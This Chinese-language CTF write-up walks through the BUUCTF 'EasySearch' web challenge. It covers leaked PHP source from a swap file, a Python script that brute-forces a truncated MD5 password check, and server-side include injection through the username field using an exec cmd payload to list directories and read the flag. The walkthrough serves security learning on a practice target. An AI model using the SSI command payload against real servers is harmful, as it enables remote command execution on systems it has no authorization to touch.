BUUCTF-web EasySearch (服务端包含注入ssi)

一打开就是登录页面

BUUCTF-web EasySearch (服务端包含注入ssi)

 

 

 存在index.php.swp。。。(反正我是没有扫出来,题目没给提示),分析一波源码


<?php ob_start(); function get_hash(){ $chars = ‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-‘; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times $content = uniqid().$random; return sha1($content); } header("Content-Type: text/html;charset=utf-8"); *** if(isset($_POST[‘username‘]) and $_POST[‘username‘] != ‘‘ ) { $admin = ‘6d0bc1‘; if ( $admin == substr(md5($_POST[‘password‘]),0,6)) { echo "<script>alert(‘[+] Welcome to manage system‘)</script>"; $file_shtml = "public/".get_hash().".shtml"; $shtml = fopen($file_shtml, "w") or die("Unable to open file!"); $text = ‘ *** *** <h1>Hello,‘.$_POST[‘username‘].‘</h1> *** ***‘; fwrite($shtml,$text); fclose($shtml); *** echo "[!] Header error ..."; } else { echo "<script>alert(‘[!] Failed‘)</script>"; }else { *** } *** ?>

只要密码的md5的前六位等于‘6d0bc1‘就能成功登陆
构造爆破脚本

#!/usr/bin/python
import hashlib
a="6d0bc1"
password="0123456789"
for i in range(10000000):
   c=hashlib.md5(str(i)).hexdigest()
   if c[0:6]==a:
    print (i)

很快就有结果了

BUUCTF-web EasySearch (服务端包含注入ssi)

 

 

bp发现url

BUUCTF-web EasySearch (服务端包含注入ssi)

其实从url就能看出可能存在ssi注入,因为存在shtml后缀(可参考https://blog.csdn.net/qq_40657585/article/details/84260844)

ssi是在html文件中可以通过注释行调用命令,允许通过html页面注入任意代码

 

BUUCTF-web EasySearch (服务端包含注入ssi)

用户名是可控的,可以在登陆框尝试注入

用户名输入<!--#exec cmd="ls"-->

BUUCTF-web EasySearch (服务端包含注入ssi)

 

 

 

 

 

 

 没有发现flag文件,于是查找上级目录

BUUCTF-web EasySearch (服务端包含注入ssi)

 

 

 发现flag,用cat读取即可

 

BUUCTF-web EasySearch (服务端包含注入ssi)

上一篇:通过 Hibernate 实现 JPA 对象关系模型之继承映射策略


下一篇:android Binder机制